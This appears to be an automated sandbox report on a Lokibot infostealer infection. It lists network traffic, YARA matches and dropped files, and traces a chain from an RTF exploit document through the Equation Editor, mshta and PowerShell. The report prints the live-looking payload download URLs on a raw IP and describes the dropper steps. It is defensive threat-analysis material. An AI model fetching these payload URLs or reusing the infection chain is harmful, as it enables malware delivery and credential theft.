Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: powershell.exe, 0000000A.00000002.415492102.00000000020CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.231/33/caspol.eln
Source: powershell.exe, 0000000A.00000002.415492102.00000000020CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.423235653.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.231/33/caspol.exe
Source: powershell.exe, 0000000A.00000002.423235653.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.231/33/caspol.exeY
Source: EQNEDT32.EXE, 00000008.00000002.390071517.000000000032F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.hta
Source: EQNEDT32.EXE, 00000008.00000002.390071517.000000000032F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaMd
Source: EQNEDT32.EXE, 00000008.00000002.390071517.000000000032F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htafd
Source: EQNEDT32.EXE, 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaj
Source: we on 66.63.187.231.url.0.dr	String found in binary or memory: http://66.63.187.231/xampp/wer/we/
Source: powershell.exe, 0000000A.00000002.415492102.00000000020CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.415492102.0000000001F91000.00000004.00000800.00020000.00000000.sdmp, wininit.exe, 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wininit.exe, wininit.exe, 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: powershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.168.2.22:49166 -> 198.244.140.41:443 version: TLS 1.2

Source: C:\Windows\SysWOW64\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: wininit.exe PID: 2092, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: wininit.exe PID: 772, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18F2865F.doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns[1].doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\we on 66.63.187.231.url

Jump to behavior

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\caspol[1].exe			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\wininit.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Memory allocated: 770B0000 page execute and read and write

Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: 16_2_003704C0	16_2_003704C0
Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: 16_2_00372808	16_2_00372808
Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: 16_2_0037108F	16_2_0037108F
Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: 16_2_003710D2	16_2_003710D2
Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: 16_2_0037C410	16_2_0037C410
Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: 16_2_0037D6D8	16_2_0037D6D8
Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: 16_2_0037C848	16_2_0037C848
Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: 16_2_0037CC80	16_2_0037CC80
Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: 16_2_0037BFD8	16_2_0037BFD8
Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: 18_2_0040549C	18_2_0040549C
Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: 18_2_004029D4	18_2_004029D4

Source: ~WRF{AEC8DEF0-2232-4A59-9D7A-1B902DE75BDE}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: String function: 00405B6F appears 42 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Users\user\AppData\Roaming\wininit.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory

Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
